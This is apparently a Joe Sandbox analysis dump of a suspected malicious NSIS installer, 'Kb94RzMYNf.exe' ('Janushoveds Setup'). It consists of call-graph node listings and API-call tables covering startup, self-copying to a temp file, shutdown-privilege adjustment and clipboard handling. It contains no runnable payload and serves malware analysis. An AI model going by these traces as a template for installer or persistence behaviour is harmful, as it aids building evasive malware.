3161->3163 3165 4059c5 3162->3165 3166 4058cf lstrcatW 3163->3166 3167 4058da lstrlenW FindFirstFileW 3163->3167 3164->3163 3165->3156 3168 4059c9 3165->3168 3166->3167 3169 4059a0 3167->3169 3183 4058fc 3167->3183 3170 405a04 3 API calls 3168->3170 3169->3157 3171 4059cf 3170->3171 3173 4057f9 5 API calls 3171->3173 3172 405983 FindNextFileW 3176 405999 FindClose 3172->3176 3172->3183 3175 4059db 3173->3175 3177 4059f5 3175->3177 3178 4059df 3175->3178 3176->3169 3180 4051af 25 API calls 3177->3180 3178->3156 3181 4051af 25 API calls 3178->3181 3180->3156 3184 4059ec 3181->3184 3182 405841 62 API calls 3182->3183 3183->3172 3183->3182 3185 4051af 25 API calls 3183->3185 3187 4051af 25 API calls 3183->3187 3189 405ef1 38 API calls 3183->3189 3191 406050 lstrcpynW 3183->3191 3192 4057f9 3183->3192 3186 405ef1 38 API calls 3184->3186 3185->3172 3188 4059f3 3186->3188 3187->3183 3188->3156 3189->3183 3190->3159 3191->3183 3200 405c00 GetFileAttributesW 3192->3200 3195 405826 3195->3183 3196 405814 RemoveDirectoryW 3198 405822 3196->3198 3197 40581c DeleteFileW 3197->3198 3198->3195 3199 405832 SetFileAttributesW 3198->3199 3199->3195 3201 405c12 SetFileAttributesW 3200->3201 3202 405805 3200->3202 3201->3202 3202->3195 3202->3196 3202->3197 3203->3014 3204->3014 3205->3001 3207 405da7 3206->3207 3208 405dcd GetShortPathNameW 3206->3208 3233 405c25 GetFileAttributesW CreateFileW 3207->3233 3209 405de2 3208->3209 3210 405eec 3208->3210 3209->3210 3212 405dea wsprintfA 3209->3212 3210->3020 3215 406072 18 API calls 3212->3215 3213 405db1 CloseHandle GetShortPathNameW 3213->3210 3214 405dc5 3213->3214 3214->3208 3214->3210 3216 405e12 3215->3216 3234 405c25 GetFileAttributesW CreateFileW 3216->3234 3218 405e1f 3218->3210 3219 405e2e GetFileSize GlobalAlloc 3218->3219 3220 405e50 3219->3220 3221 405ee5 CloseHandle 3219->3221 3222 405ca8 ReadFile 3220->3222 3221->3210 3223 405e58 3222->3223 3223->3221 3235 405b8a lstrlenA 3223->3235 3226 405e83 3228 405b8a 4 API calls 3226->3228 3227 405e6f lstrcpyA 3229 405e91 3227->3229 3228->3229 3230 405ec8 SetFilePointer 3229->3230 3231 405cd7 WriteFile 3230->3231 3232 405ede GlobalFree 3231->3232 3232->3221 3233->3213 3234->3218 3236 405bcb lstrlenA 3235->3236 3237 405bd3 3236->3237 3238 405ba4 lstrcmpiA 3236->3238 3237->3226 3237->3227 3238->3237 3239 405bc2 CharNextA 3238->3239 3239->3236 3946 405123 3947 405133 3946->3947 3948 405147 3946->3948 3949 405190 3947->3949 3950 405139 3947->3950 3951 40514f IsWindowVisible 3948->3951 3957 405166 3948->3957 3952 405195 CallWindowProcW 3949->3952 3953 404160 SendMessageW 3950->3953 3951->3949 3954 40515c 3951->3954 3955 405143 3952->3955 3953->3955 3959 404a79 SendMessageW 3954->3959 3957->3952 3964 404af9 3957->3964 3960 404ad8 SendMessageW 3959->3960 3961 404a9c GetMessagePos ScreenToClient SendMessageW 3959->3961 3962 404ad0 3960->3962 3961->3962 3963 404ad5 3961->3963 3962->3957 3963->3960 3973 406050 lstrcpynW 3964->3973 3966 404b0c 3974 405f97 wsprintfW 3966->3974 3968 404b16 3969 40140b 2 API calls 3968->3969 3970 404b1f 3969->3970 3975 406050 lstrcpynW 3970->3975 3972 404b26 3972->3949 3973->3966 3974->3968 3975->3972 3976 401ca3 3977 402ba2 18 API calls 3976->3977 3978 401ca9 IsWindow 3977->3978 3979 401a05 3978->3979 3980 402927 3981 402ba2 18 API calls 3980->3981 3982 402941 3981->3982 3983 402964 3982->3983 3984 40297d 3982->3984 3993 40281e 3982->3993 3989 402969 3983->3989 3990 40297a 3983->3990 3985 402993 3984->3985 3986 402987 3984->3986 3988 406072 18 API calls 3985->3988 3987 402ba2 18 API calls 3986->3987 3987->3993 3988->3993 3994 406050 lstrcpynW 3989->3994 3995 405f97 wsprintfW 3990->3995 3994->3993 3995->3993 3996 404228 lstrcpynW lstrlenW 3997 40242a 3998 402cc9 19 API calls 3997->3998 3999 402434 3998->3999 4000 402bbf 18 API calls 3999->4000 4001 40243d 4000->4001 4002 402448 RegQueryValueExW 4001->4002 4003 40281e 4001->4003 4004 40246e RegCloseKey 4002->4004 4005 402468 4002->4005 4004->4003 4005->4004 4008 405f97 wsprintfW 4005->4008 4008->4004 4009 404b2b GetDlgItem GetDlgItem 4010 404b7d 7 API calls 4009->4010 4018 404d96 4009->4018 4011 404c20 DeleteObject 4010->4011 4012 404c13 SendMessageW 4010->4012 4013 404c29 4011->4013 4012->4011 4015 404c60 4013->4015 4017 406072 18 API calls 4013->4017 4014 404e7a 4016 404f26 4014->4016 4021 404d89 4014->4021 4026 404ed3 SendMessageW 4014->4026 4019 404114 19 API calls 4015->4019 4022 404f30 SendMessageW 4016->4022 4023 404f38 4016->4023 4024 404c42 SendMessageW SendMessageW 4017->4024 4018->4014 4029 404a79 5 API calls 4018->4029 4041 404e07 4018->4041 4020 404c74 4019->4020 4025 404114 19 API calls 4020->4025 4027 40417b 8 API calls 4021->4027 4022->4023 4033 404f51 4023->4033 4034 404f4a ImageList_Destroy 4023->4034 4038 404f61 4023->4038 4024->4013 4042 404c82 4025->4042 4026->4021 4031 404ee8 SendMessageW 4026->4031 4032 40511c 4027->4032 4028 404e6c SendMessageW 4028->4014 4029->4041 4030 4050d0 4030->4021 4039 4050e2 ShowWindow GetDlgItem ShowWindow 4030->4039 4037 404efb 4031->4037 4035 404f5a GlobalFree 4033->4035 4033->4038 4034->4033 4035->4038 4036 404d57 GetWindowLongW SetWindowLongW 4040 404d70 4036->4040 4047 404f0c SendMessageW 4037->4047 4038->4030 4053 404af9 4 API calls 4038->4053 4056 404f9c 4038->4056 4039->4021 4043 404d76 ShowWindow 4040->4043 4044 404d8e 4040->4044 4041->4014 4041->4028 4042->4036 4046 404cd2 SendMessageW 4042->4046 4048 404d51 4042->4048 4051 404d0e SendMessageW 4042->4051 4052 404d1f SendMessageW 4042->4052 4060 404149 SendMessageW 4043->4060 4061 404149 SendMessageW 4044->4061 4046->4042 4047->4016 4048->4036 4048->4040 4049 404fe0 4054 4050a6 InvalidateRect 4049->4054 4059 405054 SendMessageW SendMessageW 4049->4059 4051->4042 4052->4042 4053->4056 4054->4030 4057 4050bc 4054->4057 4055 404fca SendMessageW 4055->4049 4056->4049 4056->4055 4062 404a34 4057->4062 4059->4049 4060->4021 4061->4018 4065 40496b 4062->4065 4064 404a49 4064->4030 4066 404984 4065->4066 4067 406072 18 API calls 4066->4067 4068 4049e8 4067->4068 4069 406072 18 API calls 4068->4069 4070 4049f3 4069->4070 4071 406072 18 API calls 4070->4071 4072 404a09 lstrlenW wsprintfW SetDlgItemTextW 4071->4072 4072->4064 4073 40172d 4074 402bbf 18 API calls 4073->4074 4075 401734 SearchPathW 4074->4075 4076 40174f 4075->4076 4077 4045af 4078 4045db 4077->4078 4079 4045ec 4077->4079 4138 405779 GetDlgItemTextW 4078->4138 4080 4045f8 GetDlgItem 4079->4080 4088 404657 4079->4088 4082 40460c 4080->4082 4086 404620 SetWindowTextW 4082->4086 4091 405aaf 4 API calls 4082->4091 4083 40473b 4087 4048ea 4083->4087 4140 405779 GetDlgItemTextW 4083->4140 4084 4045e6 4085 4062e4 5 API calls 4084->4085 4085->4079 4092 404114 19 API calls 4086->4092 4090 40417b 8 API calls 4087->4090 4088->4083 4088->4087 4093 406072 18 API calls 4088->4093 4095 4048fe 4090->4095 4096 404616 4091->4096 4097 40463c 4092->4097 4098 4046cb SHBrowseForFolderW 4093->4098 4094 40476b 4099 405b0c 18 API calls 4094->4099 4096->4086 4103 405a04 3 API calls 4096->4103 4100 404114 19 API calls 4097->4100 4098->4083 4101 4046e3 CoTaskMemFree 4098->4101 4102 404771 4099->4102 4104 40464a 4100->4104 4105 405a04 3 API calls 4101->4105 4141 406050 lstrcpynW 4102->4141 4103->4086 4139 404149 SendMessageW 4104->4139 4107 4046f0 4105->4107 4111 404727 SetDlgItemTextW 4107->4111 4114 406072 18 API calls 4107->4114 4109 404788 4113 40642a 5 API calls 4109->4113 4110 404650 4112 40642a 5 API calls 4110->4112 4111->4083 4112->4088 4120 40478f 4113->4120 4115 40470f lstrcmpiW 4114->4115 4115->4111 4117 404720 lstrcatW 4115->4117 4116 4047d0 4142 406050 lstrcpynW 4116->4142 4117->4111 4119 4047d7 4121 405aaf 4 API calls 4119->4121 4120->4116 4125 405a50 2 API calls 4120->4125 4126 404828 4120->4126 4122 4047dd GetDiskFreeSpaceW 4121->4122 4124 404801 MulDiv 4122->4124 4122->4126 4124->4126 4125->4120 4127 404899 4126->4127 4129 404a34 21 API calls 4126->4129 4128 4048bc 4127->4128 4131 40140b 2 API calls 4127->4131 4143 404136 KiUserCallbackDispatcher 4128->4143 4130 404886 4129->4130 4132 40489b SetDlgItemTextW 4130->4132 4133 40488b 4130->4133 4131->4128 4132->4127 4135 40496b 21 API calls 4133->4135 4135->4127 4136 4048d8 4136->4087 4144 404544 4136->4144 4138->4084 4139->4110 4140->4094 4141->4109 4142->4119 4143->4136 4145 404552 4144->4145 4146 404557 SendMessageW 4144->4146 4145->4146 4146->4087 4147 4027b4 4148 4027ba 4147->4148 4149 4027c2 FindClose 4148->4149 4150 402a4c 4148->4150 4149->4150 4151 401b37 4152 401b44 4151->4152 4153 401b88 4151->4153 4154 401bcd 4152->4154 4159 401b5b 4152->4159 4155 401bb2 GlobalAlloc 4153->4155 4156 401b8d 4153->4156 4158 406072 18 API calls 4154->4158 4166 402288 4154->4166 4157 406072 18 API calls 4155->4157 4156->4166 4172 406050 lstrcpynW 4156->4172 4157->4154 4160 402282 4158->4160 4170 406050 lstrcpynW 4159->4170 4164 405795 MessageBoxIndirectW 4160->4164 4163 401b9f GlobalFree 4163->4166 4164->4166 4165 401b6a 4171 406050 lstrcpynW 4165->4171 4168 401b79 4173 406050 lstrcpynW 4168->4173 4170->4165 4171->4168 4172->4163 4173->4166 4174 402537 4175 402562 4174->4175 4176 40254b 4174->4176 4178 402596 4175->4178 4179 402567 4175->4179 4177 402ba2 18 API calls 4176->4177 4186 402552 4177->4186 4181 402bbf 18 API calls 4178->4181 4180 402bbf 18 API calls 4179->4180 4182 40256e WideCharToMultiByte lstrlenA 4180->4182 4183 40259d lstrlenW 4181->4183 4182->4186 4183->4186 4184 4025ca 4185 4025e0 4184->4185 4187 405cd7 WriteFile 4184->4187 4186->4184 4186->4185 4188 405d06 5 API calls 4186->4188 4187->4185 4188->4184 4189 4014b8 4190 4014be 4189->4190 4191 401389 2 API calls 4190->4191 4192 4014c6 4191->4192 3413 4015b9 3414 402bbf 18 API calls 3413->3414 3415 4015c0 3414->3415 3416 405aaf 4 API calls 3415->3416 3426 4015c9 3416->3426 3417 401629 3419 40165b 3417->3419 3420 40162e 3417->3420 3418 405a31 CharNextW 3418->3426 3422 401423 25 API calls 3419->3422 3421 401423 25 API calls 3420->3421 3423 401635 3421->3423 3430 401653 3422->3430 3432 406050 lstrcpynW 3423->3432 3424 4056fb 2 API calls 3424->3426 3426->3417 3426->3418 3426->3424 3427 405718 5 API calls 3426->3427 3429 40160f GetFileAttributesW 3426->3429 3431 40567e 4 API calls 3426->3431 3427->3426 3428 401642 SetCurrentDirectoryW 3428->3430 3429->3426 3431->3426 3432->3428 3458 403c3c 3459 403c54 3458->3459 3460 403d8f 3458->3460 3459->3460 3461 403c60 3459->3461 3462 403da0 GetDlgItem GetDlgItem 3460->3462 3467 403de0 3460->3467 3464 403c6b SetWindowPos 3461->3464 3465 403c7e 3461->3465 3466 404114 19 API calls 3462->3466 3463 403e3a 3468 404160 SendMessageW 3463->3468 3477 403d8a 3463->3477 3464->3465 3469 403c83 ShowWindow 3465->3469 3470 403c9b 3465->3470 3471 403dca SetClassLongW 3466->3471 3467->3463 3472 401389 2 API calls 3467->3472 3518 403e4c 3468->3518 3469->3470 3473 403ca3 DestroyWindow 3470->3473 3474 403cbd 3470->3474 3475 40140b 2 API calls 3471->3475 3476 403e12 3472->3476 3478 40409d 3473->3478 3479 403cc2 SetWindowLongW 3474->3479 3480 403cd3 3474->3480 3475->3467 3476->3463 3483 403e16 SendMessageW 3476->3483 3478->3477 3489 4040ce ShowWindow 3478->3489 3479->3477 3481 403d7c 3480->3481 3482 403cdf GetDlgItem 3480->3482 3488 40417b 8 API calls 3481->3488 3486 403cf2 SendMessageW IsWindowEnabled 3482->3486 3487 403d0f 3482->3487 3483->3477 3484 40140b 2 API calls 3484->3518 3485 40409f DestroyWindow EndDialog 3485->3478 3486->3477 3486->3487 3491 403d1c 3487->3491 3492 403d63 SendMessageW 3487->3492 3493 403d2f 3487->3493 3502 403d14 3487->3502 3488->3477 3489->3477 3490 406072 18 API calls 3490->3518 3491->3492 3491->3502 3492->3481 3496 403d37 3493->3496 3497 403d4c 3493->3497 3494 4040ed SendMessageW 3495 403d4a 3494->3495 3495->3481 3500 40140b 2 API calls 3496->3500 3499 40140b 2 API calls 3497->3499 3498 404114 19 API calls 3498->3518 3501 403d53 3499->3501 3500->3502 3501->3481 3501->3502 3502->3494 3503 404114 19 API calls 3504 403ec7 GetDlgItem 3503->3504 3505 403ee4 ShowWindow KiUserCallbackDispatcher 3504->3505 3506 403edc 3504->3506 3528 404136 KiUserCallbackDispatcher 3505->3528 3506->3505 3508 403f0e EnableWindow 3511 403f22 3508->3511 3509 403f27 GetSystemMenu EnableMenuItem SendMessageW 3510 403f57 SendMessageW 3509->3510 3509->3511 3510->3511 3511->3509 3529 404149 SendMessageW 3511->3529 3530 406050 lstrcpynW 3511->3530 3514 403f85 lstrlenW 3515 406072 18 API calls 3514->3515 3516 403f9b SetWindowTextW 3515->3516 3517 401389 2 API calls 3516->3517 3517->3518 3518->3477 3518->3484 3518->3485 3518->3490 3518->3498 3518->3503 3519 403fdf DestroyWindow 3518->3519 3519->3478 3520 403ff9 CreateDialogParamW 3519->3520 3520->3478 3521 40402c 3520->3521 3522 404114 19 API calls 3521->3522 3523 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3522->3523 3524 401389 2 API calls 3523->3524 3525 40407d 3524->3525 3525->3477 3526 404085 ShowWindow 3525->3526 3527 404160 SendMessageW 3526->3527 3527->3478 3528->3508 3529->3511 3530->3514

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 7 4032df 1->7 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 7->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 30 403522-40353c DeleteFileW call 402dee 22->30 31 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->31 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 28 4033b4-4033b8 26->28 29 4033b9-4033bd 26->29 28->29 32 4033c3-4033c9 29->32 33 40347c-403489 call 405a31 29->33 51 403542-403548 30->51 52 4035ed-4035fd call 4037bf OleUninitialize 30->52 31->30 48 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 31->48 37 4033e4-40341d 32->37 38 4033cb-4033d3 32->38 49 40348b-40348c 33->49 50 40348d-403493 33->50 39 40343a-403474 37->39 40 40341f-403424 37->40 44 4033d5-4033d8 38->44 45 4033da 38->45 39->33 47 403476-40347a 39->47 40->39 46 403426-40342e 40->46 44->37 44->45 45->37 54 403430-403433 46->54 55 403435 46->55 47->33 56 40349b-4034a9 call 406050 47->56 48->30 48->52 49->50 50->23 58 403499 50->58 59 4035dd-4035e4 call 403899 51->59 60 40354e-403559 call 405a31 51->60 68 403723-403729 52->68 69 403603-403613 call 405795 ExitProcess 52->69 54->39 54->55 55->39 63 4034ae 56->63 58->63 67 4035e9 59->67 71 4035a7-4035b1 60->71 72 40355b-403590 60->72 63->22 67->52 74 4037a7-4037af 68->74 75 40372b-403741 GetCurrentProcess OpenProcessToken 68->75 79 4035b3-4035c1 call 405b0c 71->79 80 403619-40362d call 405718 lstrcatW 71->80 76 403592-403596 72->76 77 4037b1 74->77 78 4037b5-4037b9 ExitProcess 74->78 82 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 83 403777-403785 call 40642a 75->83 84 403598-40359d 76->84 85 40359f-4035a3 76->85 77->78 79->52 93 4035c3-4035d9 call 406050 * 2 79->93 94 40363a-403654 lstrcatW lstrcmpiW 80->94 95 40362f-403635 lstrcatW 80->95 82->83 96 403793-40379e ExitWindowsEx 83->96 97 403787-403791 83->97 84->85 89 4035a5 84->89 85->76 85->89 89->71 93->59 94->52 100 403656-403659 94->100 95->94 96->74 98 4037a0-4037a2 call 40140b 96->98 97->96 97->98 98->74 104 403662 call 4056fb 100->104 105 40365b-403660 call 40567e 100->105 109 403667-403675 SetCurrentDirectoryW 104->109 105->109 112 403682-4036ab call 406050 109->112 113 403677-40367d call 406050 109->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 122 403717-40371e call 405ef1 120->122 121->120 123 4036e0-403700 call 405ef1 call 406072 call 405730 121->123 122->52 123->120 132 403702-403709 CloseHandle 123->132 132->120
                                                                                                                                                              APIs
                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                                                                                              • GetVersion.KERNEL32 ref: 004032C9
                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                                                                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                                                                                              • GetCommandLineW.KERNEL32(Janushoveds Setup,NSIS Error), ref: 0040334D
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000), ref: 00403360
                                                                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000020), ref: 00403387
                                                                                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Janushoveds Setup,NSIS Error), ref: 0040605D
                                                                                                                                                              • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403613
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403626
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403635
                                                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 00403640
                                                                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Kb94RzMYNf.exe",00000000,?), ref: 0040364C
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                                                                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Kb94RzMYNf.exe,0042AA08,00000001), ref: 004036D6
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004037B9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\Desktop$C:\Users\user\Desktop\Kb94RzMYNf.exe$Error launching installer$Janushoveds Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                              • API String ID: 2488574733-1479152066
                                                                                                                                                              • Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                                                                                              • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                                                                                              • Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                                                                                              • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 133 4052ee-405309 134 405498-40549f 133->134 135 40530f-4053d6 GetDlgItem * 3 call 404149 call 404a4c GetClientRect GetSystemMetrics SendMessageW * 2 133->135 136 4054a1-4054c3 GetDlgItem CreateThread CloseHandle 134->136 137 4054c9-4054d6 134->137 153 4053f4-4053f7 135->153 154 4053d8-4053f2 SendMessageW * 2 135->154 136->137 140 4054f4-4054fe 137->140 141 4054d8-4054de 137->141 145 405500-405506 140->145 146 405554-405558 140->146 143 4054e0-4054ef ShowWindow * 2 call 404149 141->143 144 405519-405522 call 40417b 141->144 143->140 157 405527-40552b 144->157 150 405508-405514 call 4040ed 145->150 151 40552e-40553e ShowWindow 145->151 146->144 148 40555a-405560 146->148 148->144 155 405562-405575 SendMessageW 148->155 150->144 158 405540-405549 call 4051af 151->158 159 40554e-40554f call 4040ed 151->159 161 405407-40541e call 404114 153->161 162 4053f9-405405 SendMessageW 153->162 154->153 163 405677-405679 155->163 164 40557b-4055a6 CreatePopupMenu call 406072 AppendMenuW 155->164 158->159 159->146 172 405420-405434 ShowWindow 161->172 173 405454-405475 GetDlgItem SendMessageW 161->173 162->161 163->157 170 4055a8-4055b8 GetWindowRect 164->170 171 4055bb-4055d0 TrackPopupMenu 164->171 170->171 171->163 174 4055d6-4055ed 171->174 175 405443 172->175 176 405436-405441 ShowWindow 172->176 173->163 177 40547b-405493 SendMessageW * 2 173->177 178 4055f2-40560d SendMessageW 174->178 179 405449-40544f call 404149 175->179 176->179 177->163 178->178 180 40560f-405632 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 405634-40565b SendMessageW 180->182 182->182 183 40565d-405671 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->163
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405398
                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                                                                                • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004054C3
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                                                                                              • ShowWindow.USER32(0001047C,00000008), ref: 004054EC
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405536
                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040557B
                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405616
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
